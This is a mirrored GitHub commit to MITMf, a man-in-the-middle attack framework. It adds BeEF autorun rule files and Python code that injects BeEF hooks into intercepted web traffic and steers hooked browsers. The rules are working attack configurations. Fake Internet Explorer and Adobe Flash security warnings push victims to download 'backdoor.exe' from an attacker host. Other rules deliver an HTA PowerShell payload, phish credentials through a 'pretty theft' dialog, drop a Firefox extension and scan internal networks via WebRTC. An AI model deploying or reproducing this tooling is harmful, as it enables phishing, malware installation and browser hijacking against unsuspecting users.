github/MITMf
1
0
Fork 0
mirror of https://github.com/byt3bl33d3r/MITMf.git synced 2025-07-06 13:02:24 -07:00
Code Issues Projects Releases Packages Wiki Activity Actions

Added new beefapi.py , modified beefautorun plugin: now handles hook injection + ARE autoloading

Browse source
This commit is contained in:
byt3bl33d3r 2015-07-30 00:54:59 +02:00
parent 232e43325d
commit 87bca5e7dd
12 changed files with 561 additions and 259 deletions
Download patch file Download diff file Expand all files Collapse all files

35
config/beef_arerules/c_osx_test-return-mods.json Normal file
View file

@ -0,0 +1,35 @@
{
"name": "Test return debug stuff",
"author": "antisnatchor",
"browser": "S",
"browser_version": ">= 7",
"os": "OSX",
"os_version": "<= 10.10",
"modules": [{
"name": "test_return_ascii_chars",
"condition": null,
"options": {}
}, {
"name": "test_return_long_string",
"condition": "status==1",
"code": "var mod_input=test_return_ascii_chars_mod_output + '--(CICCIO)--';",
"options": {
"repeat": "10",
"repeat_string": "<<mod_input>>"
}
},
{
"name": "alert_dialog",
"condition": "status=1",
"code": "var mod_input=test_return_long_string_mod_output + '--(PASTICCIO)--';",
"options":{"text":"<<mod_input>>"}
},
{
"name": "get_page_html",
"condition": null,
"options": {}
}],
"execution_order": [0, 1, 2, 3],
"execution_delay": [0, 0, 0, 0],
"chain_mode": "nested-forward"
}

3
config/beef_arerules/enabled/.gitignore vendored Normal file
View file

@ -0,0 +1,3 @@
*
!.gitignore
!README

2
config/beef_arerules/enabled/README Normal file
View file

@ -0,0 +1,2 @@
Move here the ARE rule files that you want to load into BeEF.
Make sure they are .json files (any other file extension is ignored).

20
config/beef_arerules/ff_osx_extension-dropper.json Normal file
View file

@ -0,0 +1,20 @@
{
"name": "Firefox Extension Dropper",
"author": "antisnatchor",
"browser": "FF",
"browser_version": "ALL",
"os": "OSX",
"os_version": ">= 10.8",
"modules": [{
"name": "firefox_extension_dropper",
"condition": null,
"options": {
"extension_name": "Ummeneske",
"xpi_name": "Ummeneske",
"base_host": "http://172.16.45.1:3000"
}
}],
"execution_order": [0],
"execution_delay": [0],
"chain_mode": "sequential"
}

28
config/beef_arerules/ff_tux_webrtc-internalip.json Normal file
View file

@ -0,0 +1,28 @@
{"name": "Get Internal IP (WebRTC)",
"author": "antisnatchor",
"browser": "FF",
"browser_version": ">= 31",
"os": "Linux",
"os_version": "ALL",
"modules": [
{"name": "get_internal_ip_webrtc",
"condition": null,
"code": null,
"options": {}
},
{"name": "internal_network_fingerprinting",
"condition": "status==1",
"code": "var s=get_internal_ip_webrtc_mod_output.split('.');var start=parseInt(s[3])-1;var end=parseInt(s[3])+1;var mod_input = s[0]+'.'+s[1]+'.'+s[2]+'.'+start+'-'+s[0]+'.'+s[1]+'.'+s[2]+'.'+end;",
"options": {
"ipRange":"<<mod_input>>",
"ports":"80",
"threads":"5",
"wait":"2",
"timeout":"10"
}
}
],
"execution_order": [0,1],
"execution_delay": [0, 0],
"chain_mode": "nested-forward"
}

31
config/beef_arerules/ie_win_fakenotification-clippy.json Normal file
View file

@ -0,0 +1,31 @@
{
"name": "Ie Fake Notification + Clippy",
"author": "antisnatchor",
"browser": "IE",
"browser_version": "== 11",
"os": "Windows",
"os_version": ">= 7",
"modules": [
{
"name": "fake_notification_ie",
"condition": null,
"options": {
"notification_text":"Internet Explorer SECURITY NOTIFICATION: your browser is outdated and vulnerable to critical security vulnerabilities like CVE-2015-009 and CVE-2014-879. Please update it."
}
}
,{
"name": "clippy",
"condition": null,
"options": {
"clippydir": "http://172.16.45.1:3000/clippy/",
"askusertext": "Your browser appears to be out of date. Would you like to upgrade it?",
"executeyes": "http://172.16.45.1:3000/updates/backdoor.exe",
"respawntime":"5000",
"thankyoumessage":"Thanks for upgrading your browser! Look forward to a safer, faster web!"
}
}
],
"execution_order": [0,1],
"execution_delay": [0,2000],
"chain_mode": "sequential"
}

27
config/beef_arerules/ie_win_htapowershell.json Normal file
View file

@ -0,0 +1,27 @@
{
"name": "HTA PowerShell",
"author": "antisnatchor",
"browser": "IE",
"browser_version": "ALL",
"os": "Windows",
"os_version": ">= 7",
"modules": [
{
"name": "fake_notification_ie",
"condition": null,
"options": {
"notification_text":"Internet Explorer SECURITY NOTIFICATION: your browser is outdated and vulnerable to critical security vulnerabilities like CVE-2015-009 and CVE-2014-879. Please apply the Microsoft Update below:"
}
},
{
"name": "hta_powershell",
"condition": null,
"options": {
"domain":"http://172.16.45.1:3000",
"ps_url":"/ps"
}
}],
"execution_order": [0,1],
"execution_delay": [0,500],
"chain_mode": "sequential"
}

27
config/beef_arerules/ie_win_missingflash-prettytheft.json Normal file
View file

@ -0,0 +1,27 @@
{
"name": "Fake missing plugin + Pretty Theft LinkedIn",
"author": "antisnatchor",
"browser": "IE",
"browser_version": ">= 8",
"os": "Windows",
"os_version": "== XP",
"modules": [{
"name": "fake_notification_c",
"condition": null,
"options": {
"url": "http://172.16.45.1:3000/updates/backdoor.exe",
"notification_text": "The version of the Adobe Flash plugin is outdated and does not include the latest security updates. Please ignore the missing signature, we at Adobe are working on it. "
}
}, {
"name": "pretty_theft",
"condition": null,
"options": {
"choice": "Windows",
"backing": "Grey",
"imgsauce": "http://172.16.45.1:3000/ui/media/images/beef.png"
}
}],
"execution_order": [0, 1],
"execution_delay": [0, 5000],
"chain_mode": "sequential"
}

35
config/beef_arerules/ie_win_test-return-mods.json Normal file
View file

@ -0,0 +1,35 @@
{
"name": "Test return debug stuff",
"author": "antisnatchor",
"browser": "IE",
"browser_version": "<= 8",
"os": "Windows",
"os_version": ">= XP",
"modules": [{
"name": "test_return_ascii_chars",
"condition": null,
"options": {}
}, {
"name": "test_return_long_string",
"condition": "status==1",
"code": "var mod_input=test_return_ascii_chars_mod_output + '--CICCIO--';",
"options": {
"repeat": "10",
"repeat_string": "<<mod_input>>"
}
},
{
"name": "alert_dialog",
"condition": "status=1",
"code": "var mod_input=test_return_long_string_mod_output + '--PASTICCIO--';",
"options":{"text":"<<mod_input>>"}
},
{
"name": "get_page_html",
"condition": null,
"options": {}
}],
"execution_order": [0, 1, 2, 3],
"execution_delay": [0, 0, 0, 0],
"chain_mode": "nested-forward"
}

37
config/mitmf.conf
View file

@ -6,8 +6,8 @@
# Required BeEF and Metasploit options # Required BeEF and Metasploit options
[[BeEF]] [[BeEF]]
beefip = 127.0.0.1 host = 127.0.0.1
beefport = 3000 port = 3000
user = beef user = beef
pass = beef pass = beef
@ -187,39 +187,6 @@
#Set your custom PAC script #Set your custom PAC script
WPADScript = 'function FindProxyForURL(url, host){if ((host == "localhost") || shExpMatch(host, "localhost.*") ||(host == "127.0.0.1") || isPlainHostName(host)) return "DIRECT"; if (dnsDomainIs(host, "RespProxySrv")||shExpMatch(host, "(*.RespProxySrv|RespProxySrv)")) return "DIRECT"; return "PROXY ISAProxySrv:3141; DIRECT";}' WPADScript = 'function FindProxyForURL(url, host){if ((host == "localhost") || shExpMatch(host, "localhost.*") ||(host == "127.0.0.1") || isPlainHostName(host)) return "DIRECT"; if (dnsDomainIs(host, "RespProxySrv")||shExpMatch(host, "(*.RespProxySrv|RespProxySrv)")) return "DIRECT"; return "PROXY ISAProxySrv:3141; DIRECT";}'
[BeEFAutorun]
#Example config for the BeefAutorun plugin
mode = oneshot
#can be set to loop, or oneshot
#in loop mode the plugin will run modules on all hooked browsers every 10 seconds
#in oneshot mode the plugin will run modules only once per hooked browser
[[ALL]] #Runs specified modules on all hooked browsers
'Man-In-The-Browser'= '{}'
[[targets]] #Runs specified modules based on OS and Browser type
[[[Windows]]] #Target all Windows versions using Firefox and Internet Explorer
[[[[FF]]]]
'Fake Notification Bar (Firefox)' = '{"url": "http://example.com/payload", "notification_text": "Click this if you dare"}'
[[[[IE]]]]
'Fake Notification Bar (IE)' = '{"notification_text": "Click this if you dare"}'
[[[Windows 7]]] #Target only Windows 7 using Chrome
[[[[C]]]]
'Fake Notification Bar (Chrome)' = '{"url": "http://example.com/payload", "notification_text: "Click this if you dare"}'
[[[Linux]]] #Target Linux platforms using Chrome
[[[[C]]]]
'Redirect Browser (Rickroll)' = '{}'
[AppCachePoison] [AppCachePoison]
# HTML5 AppCache poisioning attack # HTML5 AppCache poisioning attack
# see http://blog.kotowicz.net/2010/12/squid-imposter-phishing-websites.html for description of the attack. # see http://blog.kotowicz.net/2010/12/squid-imposter-phishing-websites.html for description of the attack.

496
core/beefapi.py
View file

@ -22,292 +22,340 @@
import requests import requests
import json import json
import logging
from UserList import UserList from UserList import UserList
logging.getLogger("requests").setLevel(logging.WARNING) #Disables "Starting new HTTP Connection (1)" log message
class BeefAPI: class BeefAPI:
def __init__(self, opts=[]): def __init__(self, opts=[]):
self.host = opts.get('host') or "127.0.0.1" self.host = opts.get('host') or "127.0.0.1"
self.port = opts.get('port') or "3000" self.port = opts.get('port') or "3000"
self.token = None self.token = None
self.url = "http://{}:{}/api/".format(self.host, self.port) self.url = "http://{}:{}/api/".format(self.host, self.port)
self.login_url = self.url + "admin/login" self.login_url = self.url + "admin/login"
def login(self, username, password): def login(self, username, password):
try: try:
auth = json.dumps({"username": username, "password": password}) auth = json.dumps({"username": username, "password": password})
r = requests.post(self.login_url, data=auth) r = requests.post(self.login_url, data=auth)
data = r.json() data = r.json()
if (r.status_code == 200) and (data["success"]): if (r.status_code == 200) and (data["success"]):
self.token = data["token"] #Auth token self.token = data["token"] #Auth token
self.hooks_url = "{}hooks?token={}".format(self.url, self.token)
self.modules_url = "{}modules?token={}".format(self.url, self.token)
self.logs_url = "{}logs?token={}".format(self.url, self.token)
self.dns_url = "{}dns/ruleset?token={}".format(self.url, self.token)
return True
elif r.status_code != 200:
return False
except Exception as e: self.hooks_url = "{}hooks?token={}".format(self.url, self.token)
print "[BeEF-API] Error logging in to BeEF: {}".format(e) self.modules_url = "{}modules?token={}".format(self.url, self.token)
self.logs_url = "{}logs?token={}".format(self.url, self.token)
self.are_url = "{}autorun/rule/".format(self.url)
self.dns_url = "{}dns/ruleset?token={}".format(self.url, self.token)
@property return True
def hooked_browsers(self): elif r.status_code != 200:
r = requests.get(self.hooks_url) return False
return Hooked_Browsers(r.json(), self.url, self.token)
@property except Exception as e:
def dns(self): print "[BeEF-API] Error logging in to BeEF: {}".format(e)
r = requests.get(self.dns_url)
return DNS(r.json(), self.url, self.token)
@property @property
def logs(self): def hooked_browsers(self):
logs = [] r = requests.get(self.hooks_url)
r = requests.get(self.logs_url) return Hooked_Browsers(r.json(), self.url, self.token)
for log in r.json()['logs']:
logs.append(Log(log))
return logs
@property @property
def modules(self): def dns(self):
modules = ModuleList([]) r = requests.get(self.dns_url)
r = requests.get(self.modules_url) return DNS(r.json(), self.url, self.token)
for k,v in r.json().iteritems():
modules.append(Module(v, self.url, self.token)) @property
return modules def logs(self):
logs = []
r = requests.get(self.logs_url)
for log in r.json()['logs']:
logs.append(Log(log))
return logs
@property
def modules(self):
modules = ModuleList([])
r = requests.get(self.modules_url)
for k,v in r.json().iteritems():
modules.append(Module(v, self.url, self.token))
return modules
@property
def are_rules(self):
return ARE_Rules(self.are_url, self.token)
class ModuleList(UserList): class ModuleList(UserList):
def __init__(self, mlist): def __init__(self, mlist):
self.data = mlist self.data = mlist
def findbyid(self, m_id): def findbyid(self, m_id):
for m in self.data: for m in self.data:
if m_id == m.id: if m_id == m.id:
return m return m
def findbyname(self, m_name): def findbyname(self, m_name):
pmodules = ModuleList([]) pmodules = ModuleList([])
for m in self.data: for m in self.data:
if (m.name.lower().find(m_name.lower()) != -1) : if (m.name.lower().find(m_name.lower()) != -1) :
pmodules.append(m) pmodules.append(m)
return pmodules return pmodules
class SessionList(UserList): class SessionList(UserList):
def __init__(self, slist): def __init__(self, slist):
self.data = slist self.data = slist
def findbysession(self, session): def findbysession(self, session):
for s in self.data: for s in self.data:
if s.session == session: if s.session == session:
return s return s
def findbyos(self, os): def findbyos(self, os):
res = SessionList([]) res = SessionList([])
for s in self.data: for s in self.data:
if (s.os.lower().find(os.lower()) != -1): if (s.os.lower().find(os.lower()) != -1):
res.append(s) res.append(s)
return res return res
def findbyip(self, ip): def findbyip(self, ip):
res = SessionList([]) res = SessionList([])
for s in self.data: for s in self.data:
if ip == s.ip: if ip == s.ip:
res.append(s) res.append(s)
return res return res
def findbyid(self, s_id): def findbyid(self, s_id):
for s in self.data: for s in self.data:
if s.id == s_id: if s.id == s_id:
return s return s
def findbybrowser(self, browser): def findbybrowser(self, browser):
res = SessionList([]) res = SessionList([])
for s in self.data: for s in self.data:
if browser == s.name: if browser == s.name:
res.append(s) res.append(s)
return res return res
def findbybrowser_v(self, browser_v): def findbybrowser_v(self, browser_v):
res = SessionList([]) res = SessionList([])
for s in self.data: for s in self.data:
if browser_v == s.version: if browser_v == s.version:
res.append(s) res.append(s)
return res return res
def findbypageuri(self, uri): def findbypageuri(self, uri):
res = SessionList([]) res = SessionList([])
for s in self.data: for s in self.data:
if uri in s.page_uri: if uri in s.page_uri:
res.append(s) res.append(s)
return res return res
def findbydomain(self, domain): def findbydomain(self, domain):
res = SessionList([]) res = SessionList([])
for s in self.data: for s in self.data:
if domain in s.domain: if domain in s.domain:
res.append(s) res.append(s)
return res return res
class ARE_Rule(object):
def __init__(self, data, url, token):
self.url = url
self.token = token
for k,v in data.iteritems():
setattr(self, k, v)
self.modules = json.loads(self.modules)
def trigger(self):
r = requests.get('{}/trigger/{}?token={}'.format(self.url, self.id, self.token))
return r.json()
def delete(self):
r = requests.get('{}/delete/{}?token={}'.format(self.url, self.id, self.token))
return r.json()
class ARE_Rules(object):
def __init__(self, url, token):
self.url = url
self.token = token
def list(self):
rules = []
r = requests.get('{}/list/all?token={}'.format(self.url, self.token))
data = r.json()
if (r.status_code == 200) and (data['success']):
for rule in data['rules']:
rules.append(ARE_Rule(rule, self.url, self.token))
return rules
def add(self, rule_path):
if rule_path.endswith('.json'):
headers = {'Content-Type': 'application/json; charset=UTF-8'}
with open(rule_path, 'r') as rule:
payload = rule.read()
r = requests.post('{}/add?token={}'.format(self.url, self.token), data=payload, headers=headers)
return r.text #currently the returned object can't be serialized to JSON
def trigger(self, rule_id):
r = requests.get('{}/trigger/{}?token={}'.format(self.url, rule_id, self.token))
return r.json()
def delete(self, rule_id):
r = requests.get('{}/delete/{}?token={}'.format(self.url, rule_id, self.token))
return r.json()
class Module(object): class Module(object):
def __init__(self, data, url, token): def __init__(self, data, url, token):
self.url = url self.url = url
self.token = token self.token = token
self.id = data['id'] for k,v in data.iteritems():
self.name = data['name'] setattr(self, k, v)
self.category = data['category']
@property @property
def options(self): def options(self):
r = requests.get("{}/modules/{}?token={}".format(self.url, self.id, self.token)).json() r = requests.get("{}/modules/{}?token={}".format(self.url, self.id, self.token)).json()
return r['options'] return r['options']
@property @property
def description(self): def description(self):
r = requests.get("{}/modules/{}?token={}".format(self.url, self.id, self.token)).json() r = requests.get("{}/modules/{}?token={}".format(self.url, self.id, self.token)).json()
return r['description'] return r['description']
def run(self, session, options={}): def run(self, session, options={}):
headers = {"Content-Type": "application/json", "charset": "UTF-8"} headers = {"Content-Type": "application/json", "charset": "UTF-8"}
payload = json.dumps(options) payload = json.dumps(options)
r = requests.post("{}/modules/{}/{}?token={}".format(self.url, session, self.id, self.token), headers=headers, data=payload) r = requests.post("{}/modules/{}/{}?token={}".format(self.url, session, self.id, self.token), headers=headers, data=payload)
return r.json() return r.json()
def multi_run(self, options={}, hb_ids=[]): def multi_run(self, options={}, hb_ids=[]):
headers = {"Content-Type": "application/json", "charset": "UTF-8"} headers = {"Content-Type": "application/json", "charset": "UTF-8"}
payload = json.dumps({"mod_id":self.id, "mod_params": options, "hb_ids": hb_ids}) payload = json.dumps({"mod_id":self.id, "mod_params": options, "hb_ids": hb_ids})
r = requests.post("{}/modules/multi_browser?token={}".format(self.url, self.token), headers=headers, data=payload) r = requests.post("{}/modules/multi_browser?token={}".format(self.url, self.token), headers=headers, data=payload)
return r.json() return r.json()
def results(self, session, cmd_id): def results(self, session, cmd_id):
r = requests.get("{}/modules/{}/{}/{}?token={}".format(self.url, session, self.id, cmd_id, self.token)) r = requests.get("{}/modules/{}/{}/{}?token={}".format(self.url, session, self.id, cmd_id, self.token))
return r.json() return r.json()
class Log(object): class Log(object):
def __init__(self, log_dict): def __init__(self, log_dict):
self.id = log_dict['id'] for k,v in log_dict.iteritems():
self.date = log_dict['date'] setattr(self, k, v)
self.event = log_dict['event']
self.type = log_dict['type']
class DNS_Rule(object): class DNS_Rule(object):
def __init__(self, rule, url, token): def __init__(self, rule, url, token):
self.url = url self.url = url
self.token = token self.token = token
self.id = rule['id'] for k,v in rule.iteritems():
self.pattern = rule['pattern'] setattr(self, k, v)
self.type = rule['type']
self.response = rule=['response']
def delete(self): def delete(self):
r = requests.delete("{}/dns/rule/{}?token={}".format(self.url, self.id, self.token)) r = requests.delete("{}/dns/rule/{}?token={}".format(self.url, self.id, self.token))
return r.json() return r.json()
class DNS(object): class DNS(object):
def __init__(self, data, url, token): def __init__(self, data, url, token):
self.data = data self.data = data
self.url = url self.url = url
self.token = token self.token = token
@property @property
def ruleset(self): def ruleset(self):
ruleset = [] ruleset = []
r = requests.get("{}/dns/ruleset?token={}".format(self.url, self.token)) r = requests.get("{}/dns/ruleset?token={}".format(self.url, self.token))
for rule in r.json()['ruleset']: for rule in r.json()['ruleset']:
ruleset.append(DNS_Rule(rule, self.url, self.token)) ruleset.append(DNS_Rule(rule, self.url, self.token))
return ruleset return ruleset
def add(self, pattern, resource, response=[]): def add(self, pattern, resource, response=[]):
headers = {"Content-Type": "application/json", "charset": "UTF-8"} headers = {"Content-Type": "application/json", "charset": "UTF-8"}
payload = json.dumps({"pattern": pattern, "resource": resource, "response": response}) payload = json.dumps({"pattern": pattern, "resource": resource, "response": response})
r = requests.post("{}/dns/rule?token={}".format(self.url, self.token), headers=headers, data=payload) r = requests.post("{}/dns/rule?token={}".format(self.url, self.token), headers=headers, data=payload)
return r.json() return r.json()
def delete(self, rule_id): def delete(self, rule_id):
r = requests.delete("{}/dns/rule/{}?token={}".format(self.url, rule_id, self.token)) r = requests.delete("{}/dns/rule/{}?token={}".format(self.url, rule_id, self.token))
return r.json() return r.json()
class Hooked_Browsers(object): class Hooked_Browsers(object):
def __init__(self, data, url, token): def __init__(self, data, url, token):
self.data = data self.data = data
self.url = url self.url = url
self.token = token self.token = token
@property @property
def online(self): def online(self):
sessions = SessionList([]) sessions = SessionList([])
for k,v in self.data['hooked-browsers']['online'].iteritems(): for k,v in self.data['hooked-browsers']['online'].iteritems():
sessions.append(Session(v['session'], self.data, self.url, self.token)) sessions.append(Session(v['session'], self.data, self.url, self.token))
return sessions return sessions
@property @property
def offline(self): def offline(self):
sessions = SessionList([]) sessions = SessionList([])
for k,v in self.data['hooked-browsers']['offline'].iteritems(): for k,v in self.data['hooked-browsers']['offline'].iteritems():
sessions.append(Session(v['session'], self.data, self.url, self.token)) sessions.append(Session(v['session'], self.data, self.url, self.token))
return sessions return sessions
class Session(object): class Session(object):
def __init__(self, session, data, url, token): def __init__(self, session, data, url, token):
self.session = session self.session = session
self.data = data self.data = data
self.url = url self.url = url
self.token = token self.token = token
self.domain = self.get_property('domain') self.domain = self.get_property('domain')
self.id = self.get_property('id') self.id = self.get_property('id')
self.ip = self.get_property('ip') self.ip = self.get_property('ip')
self.name = self.get_property('name') #Browser name self.name = self.get_property('name') #Browser name
self.os = self.get_property('os') self.os = self.get_property('os')
self.page_uri = self.get_property('page_uri') self.page_uri = self.get_property('page_uri')
self.platform = self.get_property('platform') #Ex. win32 self.platform = self.get_property('platform') #Ex. win32
self.port = self.get_property('port') self.port = self.get_property('port')
self.version = self.get_property('version') #Browser version self.version = self.get_property('version') #Browser version
@property @property
def details(self): def details(self):
r = requests.get('{}/hooks/{}?token={}'.format(self.url, self.session, self.token)) r = requests.get('{}/hooks/{}?token={}'.format(self.url, self.session, self.token))
return r.json() return r.json()
@property @property
def logs(self): def logs(self):
logs = [] logs = []
r = requests.get('{}/logs/{}?token={}'.format(self.url, self.session, self.token)) r = requests.get('{}/logs/{}?token={}'.format(self.url, self.session, self.token))
for log in r.json()['logs']: for log in r.json()['logs']:
logs.append(Log(log)) logs.append(Log(log))
return logs return logs
def run(self, module_id, options={}): def run(self, module_id, options={}):
headers = {"Content-Type": "application/json", "charset": "UTF-8"} headers = {"Content-Type": "application/json", "charset": "UTF-8"}
payload = json.dumps(options) payload = json.dumps(options)
r = requests.post("{}/modules/{}/{}?token={}".format(self.url, self.session, module_id, self.token), headers=headers, data=payload) r = requests.post("{}/modules/{}/{}?token={}".format(self.url, self.session, module_id, self.token), headers=headers, data=payload)
return r.json() return r.json()
def multi_run(self, options={}): def multi_run(self, options={}):
headers = {"Content-Type": "application/json", "charset": "UTF-8"} headers = {"Content-Type": "application/json", "charset": "UTF-8"}
payload = json.dumps({"hb": self.session, "modules":[options]}) payload = json.dumps({"hb": self.session, "modules":[options]})
r = requests.post("{}/modules/multi_module?token={}".format(self.url, self.token), headers=headers, data=payload) r = requests.post("{}/modules/multi_module?token={}".format(self.url, self.token), headers=headers, data=payload)
return r.json() return r.json()
def get_property(self, key): def get_property(self, key):
for k,v in self.data['hooked-browsers'].iteritems(): for k,v in self.data['hooked-browsers'].iteritems():
for l,s in v.iteritems(): for l,s in v.iteritems():
if self.session == s['session']: if self.session == s['session']:
return s[key] return s[key]

79
plugins/beefautorun.py Normal file
View file

@ -0,0 +1,79 @@
#!/usr/bin/env python2.7
# Copyright (c) 2014-2016 Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import os
from plugins.plugin import Plugin
from plugins.inject import Inject
from core.beefapi import BeefAPI
from mitmflib.watchdog.observers import Observer
from mitmflib.watchdog.events import FileSystemEventHandler
class BeefAutorun(Inject, Plugin):
name = "BeEFAutoloader"
optname = "beefauto"
desc = "Injects BeEF hooks & manages BeEF's ARE rule loading"
version = "0.4"
def initialize(self, options):
self.options = options
self.ip_address = options.ip
beefconfig = self.config['MITMf']['BeEF']
Inject.initialize(self, options)
self.js_url = 'http://{}:{}/hook.js'.format(options.ip , ['port'])
beefconfig = self.config['MITMf']['BeEF']
from core.utils import shutdown
beef = BeefAPI({"host": beefconfig['host'], "port": beefconfig['port']})
if not beef.login(beefconfig['user'], beefconfig['pass']):
shutdown("[BeEFAutorun] Error logging in to BeEF!")
self.tree_info.append('Starting RuleWatcher')
RuleWatcher(beef, self.log).start()
def options(self, options):
pass
class RuleWatcher(FileSystemEventHandler):
def __init__(self, beef, logger):
FileSystemEventHandler.__init__(self)
self.beef = beef
self.log = logger
def on_modified(self, event):
self.log.debug('Detected ARE rule change!')
for rule in self.beef.are_rules.list():
self.log.debug('Deleting rule id: {} name: {}'.format(rule.id, rule.name))
rule.delete()
if event.src_path.endswith('.json'):
self.log.debug('Detected ARE rule modification/addition!')
for rule in os.listdir('./config/beef_arerules/enabled'):
if rule.endswith('.json'):
rule_path = './config/beef_arerules/enabled/' + rule
self.log.debug('Adding rule {}'.format(rule_path))
self.beef.are_rules.add(rule_path)
def start(self):
observer = Observer()
observer.schedule(self, path='./config/beef_arerules/enabled', recursive=False)
observer.start()